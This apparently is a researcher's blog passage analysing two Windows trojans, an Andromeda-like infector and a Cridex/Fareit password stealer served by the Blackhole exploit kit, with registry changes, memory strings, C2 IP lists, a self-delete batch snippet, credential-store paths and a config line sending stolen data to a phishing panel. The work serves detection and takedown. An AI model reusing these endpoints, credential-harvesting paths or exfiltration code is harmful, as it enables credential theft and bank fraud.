PID: 3140 [PATH]\calc.exe ADDR: 0x87021b 
CopyFileA(lpExistingFileName: "[PATH]\calc.exe",
lpNewFileName: "%AppData%\igfx\igfxtray.exe",
bFailIfExists: 0x0)
In the same folder also detected the Identifier text file contains the defined HostID of my test machine: Upon execution, after self-copied, it also inject into another process: Which was executed from the new path: In registry was detected the below additional changes:
----------------------------------
Keys added:
----------------------------------
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{SG16VPH3-6PN7-VTP0-6V64-104BV7F3IRAF}
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.Identifier
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.Identifier\OpenWithList
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams\6
----------------------------------
Values added:
----------------------------------
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{SG16VPH3-6PN7-VTP0-6V64-104BV7F3IRAF}\StubPath: ""C:\Documents and Settings\USER\Application Data\igfx\igfxtray.exe""
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Run\igfxtray: "C:\Documents and Settings\USER\Application Data\igfx\igfxtray.exe"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\USER\Application Data\igfx\igfxtray.exe: "Pagent Show"
----------------------------------
Values deleted:
----------------------------------
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\14: 30 00 31 00 30 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 31 30 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 31 00 30 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
----------------------------------
Values modified:
----------------------------------
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 02 00 00 00 1E 00 00 00 E0 FD F4 9E 68 F6 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 02 00 00 00 20 00 00 00 00 65 59 10 6B F6 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 02 00 00 00 3F 00 00 00 20 49 41 9F 68 F6 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 02 00 00 00 41 00 00 00 D0 E8 6E 10 6B F6 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:::{450Q8SON-NQ25-11Q0-98N8-0800361O1103}: 01 00 00 00 06 00 00 00 60 85 99 AA 71 A4 CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:::{450Q8SON-NQ25-11Q0-98N8-0800361O1103}: 02 00 00 00 07 00 00 00 C0 38 E9 E7 6A F6 CD 01
We also detecting the logs created by this malware, with the location and initial value below: Tried to brute XOR it, unsuccessful... Even tried to translate it in many lang/encoding, still meaningless.. If anyone can help to figure what it is, here's the FULL log file-->>[Download]In the memory I found the similar encrypted string pattern too:
0x02D1B1   s}X_a}Tb\}
0x02D1D5 s}X_a}
0x02D1F9 s}X_a}
0x02D22D s}X_a}Lc\}
0x02D241 s}X_a}
0x02D255 s}X_a}pb\}
0x02D291 s}X_a}
0x02D2A9 a}X_a}
0x02D2B7 X_a}8c\}
0x02D2F1 s}X_a}
0x02D33D s}X_a}
0x02D387 Service Pack 3
0x02D4A0 ka}/ka}?ka}Oka}_ka}oka}
0x02D4EC pa}-pa}=pa}Mpa}]pa}mpa}}pa}
0x02D528 qa}"qa}3qa}Dqa}Uqa}fqa}wqa}
0x02D564 ra}!ra}2ra}Cra}Tra}era}vra}
0x02D5A0 sa} sa}1sa}Bsa}Ssa}dsa}usa}
0x02D5E0 ta}0ta}Ata}Rta}cta}tta}
0x02D608 ta}k_a}
0x02D618 ua}cva}}va}U
0x02D628 va}!wa};wa}
0x02D648 xa}4xa}Hxa}\xa}sxa}

CnC and Credentials..

So now we know the CnC of this payload & how it supposed to communicate:
CnC: wordpress.serveblog.net:3360 IP: 46.253.180.35 Methods: FCONNECT %s:%d HTTP/1.0 http://%s%s GET %s HTTP/1.1 Host: %s Connection: close
If we see the reverse result in memory of igfxtray.exe these data will be seen: In igfxtray.exe I found the trace of sqlite commony used by Andromeda Botnet:
sqlite3.dll
mozsqlite3.dll
%s\signons.sqlite
sqlite3_open
sqlite3_close
sqlite3_prepare_v2
sqlite3_step
sqlite3_column_text
Let's be sure by capturing the traffic, below is the pic of take-1 PCAP: With the packet data as per HEX below: I share the PCAP capture data below [PCAP1][PCAP2][PCAP3][ADDITIONAL]Other researcher was kindly to contribute his PCAP Traffic Data which proofing the communication between infected PC to the host: ugctrust.com and requesting POST command to ugctrust.com/image.php, as per below capture snapshot of the traffic related in details: The PCAP data is here --->>[PCAP]Thank's to @Userbased in kernelmode for the support. Now we have clear evidence that related this malware to ugctrust.com that backing up the verdict of REVETON download caused by this set of trojans. Furthermore in the memory was detected many OTHER stuff.. The below browser's path:
%s\Mozilla\Firefox\profiles.ini
%s\Mozilla\Firefox\%s
%s\Thunderbird\profiles.ini
%s\Thunderbird\%s
%s\Mozilla\SeaMonkey\profiles.ini
%s\Mozilla\SeaMonkey\%s
%s\Opera\Opera\wand.dat
%s\Opera\Opera\profile\wand.dat
And the location of our passwords/credentials
WindowsLive:name=*
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Email
POP3 User
POP3 Server
POP3 Password
IMAP User
IMAP Server
IMAP Password
HTTP User
HTTP Server
HTTP Password
SMTP User
SMTP Server
SMTP Password
%c%c%S
abe2869f-9b47-4cd9-a358-c22904dba7f7
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
index.dat
History
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%s\Google\Chrome\User Data\Default\Login Data
%s\Chromium\User Data\Default\Login Data
localhost
USERNAME
Just like the info.exe, my PC data also loaded & spotted:
0x02CEBD   ALLUSERSPROFILE=C:\Documents and Settings\All Users
0x02CF25 APPDATA=C:\Documents and Settings\%USER%\Application Data
0x02CF93 CommonProgramFiles=C:\Program Files\Common Files
0x02CFF5 COMPUTERNAME=%USER%-1379CF37C25
0x02D02F ComSpec=C:\WINDOWS\system32\cmd.exe
0x02D077 FP_NO_HOST_CHECK=NO
0x02D09F HOMEDRIVE=C:
0x02D0B9 HOMEPATH=\Documents and Settings\%USER%
0x02D103 LOGONSERVER=\\%USER%-1379CF37C25
0x02D13F NUMBER_OF_PROCESSORS=1
0x02D16D OS=Windows_NT
0x02D189 Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
0x02D203 PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
0x02D275 PROCESSOR_ARCHITECTURE=x86
0x02D2AB PROCESSOR_IDENTIFIER=x86 Family 6 Model 13 Stepping 6, GenuineIntel
0x02D333 PROCESSOR_LEVEL=6
0x02D357 PROCESSOR_REVISION=0d06
0x02D387 ProgramFiles=C:\Program Files
0x02D3C3 SESSIONNAME=Console
0x02D3EB SystemDrive=C:
0x02D409 SystemRoot=C:\WINDOWS
0x02D435 TEMP=C:\DOCUME~1\%USER%\LOCALS~1\Temp
0x02D47B TMP=C:\DOCUME~1\%USER%\LOCALS~1\Temp
0x02D4BF USERDOMAIN=%USER%-1379CF37C25
0x02D4F5 USERNAME=%USER%
0x02D50F USERPROFILE=C:\Documents and Settings\%USER%
I think this is how they format the log:
%s.Identifier
%Rand%
%d:0:0:%s\%s;
%d:%I64u:0:%s\%s;
%c%I64u
%llu
%s%.2d-%.2d-%.4d
[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
You can call me "paranoia" but these key's data is there...
[Backspace]
[Enter]
[Tab]
[Arrow Left]
[Arrow Up]
[Arrow Right]
[Arrow Down]
[Home]
[Page Up]
[Page Down]
[End]
[Break]
[Delete]
[Insert]
[Print Screen]
[Scroll Lock]
[Caps Lock]
[Alt]
[Esc]
[Ctrl+%c]
The rest of the memory data in text is here -->>[Download]I captured the memory dump of igfxtray.exe here -->>[Download] What happened after we restart the PC? It just won't start, my MBR must have been changed.. A buggy Andromeda infection with Ransomware?? :-( Sadly I did not see any traffic to/from ugctrust.com nor a ransomware download.. Anyway the Botnet and Blackhole EK used is still up and running, who knows what they will infect us with next, let's shut this "badest" bad" actor down!

Network Infection Analysis (Evidence of Crime of mongif.biz)

The Blackhole malware infector IP hosted by domain mongif.bizwas confirmedto be registered & used for malware infection purpose only, and curently still distributing Ransomware Malware actively.The other reports shows incident reported-->>[HERE] Below is the infector domains/registration info for the SHUTDOWN purpose, I marked the ID for responsible contact. For the fellow admins, please block this IP address: 46.166.169.179
//Hosts related to the infection verdict:
"mongif.biz A 46.166.169.179
www.mongif.biz A 46.166.169.179"

//SOA record
mongif.biz
primary name server = mongif.biz
responsible mail addr = "kaizendass.gmail.com"
serial = 1358061503 ^^^^^^^^^^^^^^^^^^^^^
refresh = 10800 (3 hours)
retry = 3600 (1 hour)
expire = 604800 (7 days)
"default TTL = 38400 (10 hours 40 mins)"

//Name servers:
ns3.mongif.biz A 46.166.169.179
ns4.mongif.biz A 46.166.169.182

//INTERNET IDC:
Segment: 46.166.169.0/24
ASN: AS57668 / SANTREX-AS

//Domain Registration (ID: PP-SP-001)
Domain Name: MONGIF.BIZ
"Domain ID: D52783523-BIZ"
"Registrant ID: PP-SP-001"
^^^^^^^^^^^^^^^^^
Created by Registrar: DOMAINCONTEXT, INC.
Sponsoring Registrar: DOMAINCONTEXT, INC.
Sponsoring Registrar IANA ID:1111
Last Updated by Registrar: DOMAINCONTEXT, INC.
Domain Registration Date: Thu Jan 10 17:08:56 GMT 2013
Domain Expiration Date: Thu Jan 09 23:59:59 GMT 2014
"Domain Last Updated Date: Sun Jan 13 08:06:57 GMT 2013"
^^^^^^^^^^^^^^^^^^^^

Sample

For research + raising detection ratio purpose. Here's the samples -->>[MEDIAFIRE]

The moral of the story

Never ever insult any mother, that's just a way out of line, you'll have a BAD time & be cursed as a lifetime internet jerks like these moronz for sure..
#MalwareMustDie!!

When the PWS Stealer try to improve their way to steal... a story of Cridex/PWS Fareit (via Blackhole EK at eziponoma.ru:8080)

$
0
0

The background

It's been while since we didn't take a look into the Cridex infection. Counting the day of we first noticed this group, until the day I write this post, it should have been almost five months yet the bad actors still do their business as usual.

The infection source is spam redirected into some redirector pages to be forwarded to the landing page of the most popular exploit kit, Blackhole, at the eziponoma.ru:8080.

I've been told by my friends to start decode to other EK too to these moronz actually is not in my first priority actually, but accidentally I know an educational institution which was injected with the redirector of this case (as per I pasted in the below tweet, thank's to @Hulk_Crusader), made me morally can't just ignore this one.

The Blackhole v2.1 Infector

After checking the landing page used, PoC↓

--2013-01-26 18:21:50--  "h00p://eziponoma.ru:8080/forum/links/column.php"
Resolving "eziponoma.ru"... seconds 0.00, "202.72.245.146, 94.23.3.196, 195.210.47.208"
Caching eziponoma.ru => 202.72.245.146 94.23.3.196 195.210.47.208
Connecting to eziponoma.ru|202.72.245.146|:8080... seconds 0.00, connected.
:
GET /forum/links/column.php HTTP/1.0
Referer: h00p://www.tounichi-g.co.jp/info.htm
Host: eziponoma.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 26 Jan 2013 09:34:32 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
200 OK
Length: unspecified [text/html]
Saving to: "column.php"

2013-01-26 18:21:55 (42.3 KB/s) - "column.php" saved [117752]
It looks like this structure:

If you decode this right you'll get Blackhole2's PluginDetect 0.7.9 Script-->>[HERE]
You can use the decoding guide I wrote here -->>[HERE] to manually -
crack the download url of every exploit files & payload in there.
Shortly, here's the result of the payload/exploit components -->>[HERE]
Here's the picture as PoC:

The Cridex Infection Steps..

If you follow us in our previous blog posts -->>[HERE] about Cridex & its PWS Stealer, then you'll know that we follow this stealer in a kind of man-to-man marking, today we saw the changes in the payload as following details:


The payload looks like this:
Sections:
UPX0 0x1000 0x1d000 0
UPX1 0x1e000 0x18000 95232
.rsrc 0x36000 0x1000 2048

Entry Point at 0x16bb0
Virtual Address is 0x4347b0
Packer: UPX 3.02
Compilation timedatestamp : 2011-05-17 17:20:06
Target machine: 0x14C (Intel 386
Hexed: (Thx to Joxean Koret)
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 F0 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 97 FA C9 B9 D3 9B A7 EA D3 9B A7 EA D3 9B A7 EA ................
0090 B1 84 B4 EA D6 9B B9 EA D6 97 F8 EA 9F 9B 21 EA ..............!.
00A0 80 B8 BE EA EE 9B 26 EA BC 84 AD EA D2 9B FD EA ......&.........
00B0 B1 84 B4 EA D7 9B 00 EA BC 84 A3 EA DF 9B 76 EA ..............v.
: : :

//"ExifTool: (Thank's for Phil Harvey)
SubsystemVersion : 4 0
InitializedDataSize : 4096
ImageVersion : 7 3
ProductName : Midas
FileVersionNumber : 10.5.0.0
UninitializedDataSize : 118784
LanguageCode : English (U S )
FileFlagsMask : 0x003f
CharacterSet : Unicode
LinkerVersion : 7 0
FileOS : Windows NT 32-bit
MIMEType : application/octet-stream
Subsystem : Windows GUI
FileVersion : 10, 5, 4
TimeStamp : 2011:05:17 18:20:06+01:00
FileType : Win32 EXE
PEType : PE32
InternalName : Hugo
ProductVersion : 10, 5
FileDescription : Laos Prow Gyro
OSVersion : 5 3
OriginalFilename : Pcahitt exe
LegalCopyright : Yield (2000) 2008 Caesar
MachineType : Intel 386 or later, and compatibles
CompanyName : Ysy
CodeSize : 98304
FileSubtype : 0
ProductVersionNumber : 10.5.0.0
EntryPoint : 0x347b0
ObjectFileType : Executable application

// Result in VirusTotal (Thx!)

[0x00000000:0x00400000]> !date
Sat Jan 26 18:59:52 JST 2013
[0x00000000:0x00400000]> vt
File about.exe with MD5 9fb4dd1b3e0b6002eff7e6f63a6b6d07
--------------------------------------------------------

F-Secure : Trojan.Agent.AYCY
DrWeb : Trojan.Necurs.97
GData : Trojan.Agent.AYCY
VIPRE : Trojan.Win32.Generic!BT
AntiVir : TR/Cridex.EB.43
TrendMicro : PAK_Generic.001
McAfee-GW-Edition : Heuristic.BehavesLike.Win32.ModifiedUPX.C
TrendMicro-HouseCall : PAK_Generic.001
MicroWorld-eScan : Trojan.Agent.AYCY
Avast : Win32:Rootkit-gen [Rtk]
Kaspersky : UDS:DangerousObject.Multi.Generic
BitDefender : Trojan.Agent.AYCY
McAfee : Artemis!9FB4DD1B3E0B
Malwarebytes : Trojan.Agent.ED
Ikarus : Worm.Win32.Cridex
Fortinet : W32/Kryptik.ASU!tr
TheHacker : Posible_Worm32
Microsoft : Worm:Win32/Cridex.E
ViRobot : Trojan.Win32.S.Agent.98304.BA
ESET-NOD32 : a variant of Win32/Kryptik.ASYZ

// Readable Strings: (use od w/ascii-utf option to see this)
0x017730 XPTPSW
0x017E60 KERNEL32.DLL
0x017E6D comdlg32.dll
0x017E7A oleacc.dll
0x017E85 rasapi32.dll
0x017E92 setupapi.dll
0x017E9F shlwapi.dll
0x017EAB user32.dll
0x017EB6 winspool.drv
0x017EC3 winsta.dll
0x017ED0 LoadLibraryA
0x017EDE GetProcAddress
0x017EEE VirtualProtect
0x017EFE VirtualAlloc
0x017F0C VirtualFree
0x017F1A ExitProcess
0x017F28 FindTextA
0x017F34 GetStateTextW
0x017F44 RasQuerySharedAutoDial
0x017F5C CM_Get_Class_Key_NameW
0x017F74 HashData
0x017F7E IsMenu
0x017F86 AddPrinterDriverA
0x017F9A WinStationEnumerate_IndexedA
What this binary do? Is the below steps:
about.exe (executed via shellcode API of Exploit file →kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0))
|
+-CMD.EXE (via shell calls)
|
+--%Temp%exp%n.tmp.exe (a self copy of about.exe, executed via CMD)
|
+---%AppData%KB00777165.exe (downloaded trojan PWS, executed by exp%n.tmp.exe)
Some screenshots as PoC is here: This time I provide you with the comprehension analysis of this trojan, by using my capture data so let's analyze it together. I was testing in some rounds so I have too many data to share. I'll start with the trapped malware process' accessed file data, I will pick some PID of the cascaded process above to understand it step by step.

File Calls

about.exe (I picked PID: 2116) These are the list of all activity of about.exe -->>[HERE]This process details explained the overall CMD & creation of KB00777165.exe What cmd.exe process actually do? (I picked PID: 2152) You'll see what cmd.exe process was actually do, with its correlation to the temporary file exp2.tmp.bat -->>[HERE]PS: all of these are happening in the very short time if you see the timestamp closely. How about the temporary file exp%n.tmp? (I picked PID: 4028) You can see it here -->>[HERE]It was looping and searching for a font like crazy so I cut the log for uploading purpose. It is operated as per expected. So, finally KB00777165.exe (I picked up sample with PID: 1896) The log for this was too big and many repetition, so I summarized here --->>[HERE]

Memory Analysis

In this memory analysis I will use the about.exe and KB00777165.exe only, since the other payloads are not so significant, or its process included in the about.exe and KB00777165.exe already. about.exe I found the below search path/file strings:
.exe
.srv
Mozilla\Firefox\Profiles
cookies.*
Macromedia
chrome.exe
firefox.exe
explorer.exe
Local\XMR%08X
Local\XME%08X
Local\XMM%08X
Local\XMI%08X
Software\Microsoft\Windows NT\S%08X
Software\Microsoft\Windows NT\C%08X
:
So we know that about.exe is responsible for autorun by:
NSoftware\Microsoft\Windows\CurrentVersion\Run
And also responsible for making calls to mothership:
h00p://140.123.101.4:8080
h00p://182.237.17.180:8080
h00p://220.86.69.55:8080
h00p://221.143.48.6:8080
h00p://64.85.53.168:8080
h00p://163.23.107.65:8080
h00p://210.56.23.100:8080
h00p://173.245.3.182:8080
h00p://173.201.177.77:8080
h00p://203.217.147.52:8080
h00p://97.74.113.229:8080
h00p://62.28.244.251:8080
h00p://69.64.89.82:8080
h00p://38.99.150.69:8080
h00p://174.142.68.239:8080
h00p://78.28.120.32:8080
h00p://88.119.156.20:8080
h00p://188.117.44.241:8080
h00p://217.65.100.41:8080
↑BLOCK THESE!!!You can unpack the binary to see the similar result, as per unpacked one I see here: This binary also the brain of the drops of KB00777165.exe:
sKB%08d.exe
KB00777165.exe
C:\Documents and Settings\rik\Application Data // directory made strings..
C:\Documents and Settings\rik\Application Data\KB00777165.exe // the drops..
And also its execution traces command too:
exec
cmd
"%s" /c "%s"
The batch file command used to delete the temporary binary file:
@echo off
del /F /Q /A "%S"
if exist "%S" goto R
del /F /Q /A "%S"
We know how it connect/to mothership:
%u.%u.%u.%u:%u
POST
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
application/x-www-form-urlencoded
type
UNKNOWN
USER
PASS
Some botnet command used
settings
commands
hash
httpshots
formgrabber
redirects
bconnect
httpinjects
:
setsockopt
ioctlsocket
socket
closesocket
select
recv
send
connect
freeaddrinfo
getaddrinfo
This is the all details of the method used to send data to remote host:
GET
POST
HTTP/1.0
HTTP/1.1
multipart/form-data
boundary=
Content-Disposition
name="
filename="
Content-Type
text/
Host
Referer
User-Agent
Authorization
Accept-Encoding
Content-Length
If-Modified-Since
If-None-Match
https
Transfer-Encoding
Connection
modify
pattern
replacement
httpinject
conditions
actions
redirect
process
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<style>.d{font-weight:bold;margin:5px}.f{margin:5px}</style>
<div class="d"><a href="/%S">[%S]</a></div>
<div class="f"><a href="/%S">%S</a></div>
Content-Disposition: attachment; filename=%S
↑it looks like this time the file attachment API exists.. And this is the scary parts of the format of credentials:
<http time="%%%uu">
<url>
<![CDATA["%%.%us"]]>
</url>
<useragent>
<![CDATA["%%.%us"]]>
</useragent>
<data>
<![CDATA[ ]]>
</data>
</http>
<httpshot time="%%%uu">
<url>
<![CDATA["%%.%us"]]>
</url>
<data>
<![CDATA[ ]]>
</data>
</httpshot>
<ftp time="%%%uu">
<server>
<![CDATA["%%u.%%u.%%u.%%u:%%u"]]>
</server>
<user>
<![CDATA[%%.%us]]>
</user>
<pass>
<![CDATA[ ]]>
</pass>
</ftp>
<pop3 time="%%%uu">
<server>
<![CDATA["%%u.%%u.%%u.%%u:%%u"]]>
</server>
<user>
<![CDATA[%%.%us]]>
</user>
<pass>
<![CDATA[ ]]>
</pass>
</pop3>
<cmd id="%u">%u</cmd>
<cert time="%u">
<pass>
<![CDATA[ ]]>
</pass>
<data>
<![CDATA[ ]]>
</data>
</cert>
<ie time="%u">
<data>
<![CDATA[ ]]>
</data>
</ie>
<ff time="%u">
<data>
<![CDATA[ ]]>
</data>
</ff>
<mm time="%u">
<data>
<![CDATA[ ]]>
</data>
</mm>
<message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u">
<header>
<unique>%%.%us</unique>
<version>%%u</version>
<system>%%u</system>
<network>%%u</network>
</header>
<data>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB</data>
</message>
PS: these moronz has the ACL too:
url
allow
deny
We know now that the binary was encypted some of the famous used malware dlls like ws2_32.dll with the complete list below:
"cabinet.dll
ssl3.dll
nspr4.dll
wininet.dll
ws2_32.dll
secur32.dll"
kernel32.dll
ntdll.dll
SHLWAPI.dll
ADVAPI32.dll
SHELL32.dll
*)↑The marked DLL was obfuscated in encryption can't be seen soon wihout decrypting the binary section will be impossible to be seen. Which contains the calls below:
FCIDestroy
FCIFlushFolder
FCIFlushCabinet
FCIAddFile
FCICreate
SSL_ImportFD
PR_Close
PR_Poll
PR_Read
PR_Write
PR_SetError
PR_Connect
PR_GetError
InternetWriteFile
InternetSetOptionW
InternetReadFile
InternetQueryOptionW
InternetOpenW
InternetCrackUrlW
InternetConnectW
InternetCloseHandle
HttpSendRequestExW
HttpQueryInfoA
HttpOpenRequestW
HttpEndRequestW
CryptImportPublicKeyInfo
CryptDecodeObjectEx
CryptStringToBinaryA
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertCloseStore
PFXExportCertStoreEx
CertOpenSystemStoreW
PFXImportCertStore
__WSAFDIsSet
WSAIoctl
WSARecv
WSASend
WSAGetLastError
WSASetLastError
DeleteSecurityContext
DecryptMessage
EncryptMessage
InitializeSecurityContextW
InitializeSecurityContextA
IsWow64Process
RtlRandom
RtlTimeToSecondsSince1970
NtResumeThread
NtQueueApcThread
NtQueryInformationThread
NtQuerySystemInformation
RtlZeroMemory
RtlFillMemory
RtlCompareMemory
LdrLoadDll
*) The other calls is as per seen in plain text in binary
I also found that my PC name was included in the data:
USER-1379CF37C25_9455E50D0B2D20CB
And this parts are encrypted data:
;C<R<k<
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<
3&353L3U3m3{3
6G6U6c6
7-8F8P8n8{8
:/:::E:K:c:j:t:
?5?H?c?h?q?z?
0&0F0P0f0p0
2X2]2f2o2u2
<0=:=R=\=c=j=
878=8D8U8^8g8p8x8
:':D:N:h:
<'<T<e<o<
=!=(=:=@=V=b=z=
11181A1G1N1[1d1m1{1
2&232>2F2U2a2h2q2w2~2
303<3N3_3i3r3
3Q4X4^4e4t4z4
7-7^7d7o7y7
8&8,868]8d8k8q8
9!9/9=9C9N9X9c9i9s9y9
=+=0=8=F=L=Q=W=[=a=
?!?'?I?V?i?
0<0O0U0q0w0
1[1i1s1x1
2*2I2f2t2
5&5,585>5E5K5U5[5f5p5{5
5B6G6M6W6e6k6u6~6
7+73787J7O7`7k7r7
848G8S8b8l8t8{8
<?=J=Q=j=~=
3&3<3L3n3?4l4v4
797C7N7X7o7
:!:(:.:A:l:u:
<0<;<B<N<S<Y<q<w<
?*?2?B?K?P?\?n?
141?1I1f1l1r1
2'2-2B2H2Y2b2i2u2
5,525R5e5o5|5
6!7(7H7N7V7\7f7k7q7w7|7
9$9*9A9G9N9\9c9h9
;&;2;8;>;J;V;d;i;
<3<U<b<i<r<
?1?E?O?f?o?
1M1U1e1m1|1
2"2.2B2U2_2v2
3 3*3A3J3o3x3
4%4J4S4g4
7 7*787<7@7D7H7L7P7T7n7t7
8>8R8`8i8n8x8
:':-:;:A:K:Q:\:f:q:|:
1C2g2p2
4+444=4K4R4l4
>%>+>G>M>W>s>
;$;/;9;D;L;V;a;i;};
<"<(<-<C<K<Q<V<l<t<z<
(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1 1$1(1,1014181<1@1D1P1T1X1\1`1d1h1l1p1t1x1|1
2 2$2(2,2024282<2@2D2P2T2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3
3P4T4X4
7p8t8x8
9 9h9l9p9
:
I'll try to decode it later.. In KB00777165.exe.exe I found.. Trace of compilation of the malware maker :-D
E:\FutureCode\Reverted\Samples\Id0120112309\Signal[93].exe
And decrypted keywords like, looks like the panel password to me ;-)
Ninedourb
letrayohs
dagpishalb
HoweGaffgutley
oiEmusJudoSabe
muetaecutryes
nitearMiltaa
dinPisoagonob
paDrumnacarIzar
logoxkaunarinod
houhmocSashinlo
aamyokaGoutoenu
warSkewsibsMuni
shoutagbesnahpi
Alsoutscwmti
LorewasifOils
Nansratoworngor
OuchDiel
JestGorpamemeas
odagssicHullgo
aeisledoemopcoo
hidawmap
leubaachidor
DeltweRearrob
Oatszaod
and... we have an encrypted calls like:
sh&awpki
reasMayapee&s
senrevet&enick
z&oybio
fidabUnt&un
karigL&rdbe
Mumu&inemlat
jet&tssec
Jaggoyg&y
NewsCu&fcatsan
Ko&kJustpea
wehmup&na
neShogJut&mud
mao&Jogsmil
Beanr&cjog
Leapmaeesr&x
mugcome&pp
Whapm&vetae
alla&Farocur
amox&agemsrag
bize&pet
aidtenSh&hla
dyeaa&ep
Coysmiemmit&b
&ffefreuhbome
:
Same encryption used since the other hashed data are so similar.

The registry.

I mentioned the autorun to be put in registry in the above section, thus this big blobs in the registry below:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\
Microsoft\Windows NT\SD5809E24\: 3C 73 65 74 74 69 6E 67 73 20 68
61 73 68 3D 22 30 63 35 32 30 62 36 61 35 36 66 38 61 37 33 63 38
65 66 31 61 65 39 30 37 65 64 65 63 34 34 64 36 64 38 63 61 36 64
34 22 3E 3C 68 74 74 70 73 68 6F 74 73 3E 3C 75 72 6C 20 74 79 70
65 3D 22 64 65 6E 79 22 3E 5C 2E 28 63 73 73 7C 6A 73 29 28 24 7C
:
(very loong blob...)
:
20 20 20 72 65 74 75 72 6E 20 74 72 75 65 3B 0A 7D 0A 0A 0A 3C 2F
73 63 72 69 70 74 3E 0A 5D 5D 3E 3C 2F 72 65 70 6C 61 63 65 6D 65
6E 74 3E 3C 2F 6D 6F 64 69 66 79 3E 3C 2F 61 63 74 69 6F 6E 73 3E
3C 2F 68 74 74 70 69 6E 6A 65 63 74 3E 3C 2F 68 74 74 70 69 6E 6A
65 63 74 73 3E 3C 2F 73 65 74 74 69 6E 67 73 3E
Comment: This is actually the config of the PWS Fareit trojan.. You can see it neutralized in here -->>[PASTEBIN]It contains the evil things like online banking data grabber, phishing forms, (in this case AmericanExpress etc), with the details that you can learn by my previous analysis here -->>[LINK] In that config form was written the CnC at:
<bconnect>"85,143.166.72:443"</bconnect>
<![CDATA["h00p://85.143.166.141/mx/3A/in/cp.php?h=8"]]>
And the portal/panel at below to send phishing data.
var adminPanelLocation = 'h00p://62,76.177.123/if_Career/';
var d = adminPanelLocation + 'gate.php?done=1&bid=USER-1379CF37C25_9455E50D0B2D20CB&info='+info+'&rkey=' + Math['random']();
↑BLOCK THESE!!!

Phishing Trace

If you just run the config file in the browser you'll see the phishing form traces like per below snapshot: Below are details of attempt to steal your personal information (phishing): Attempt to steal the PIN:
<!--Personal security PIN-->
:
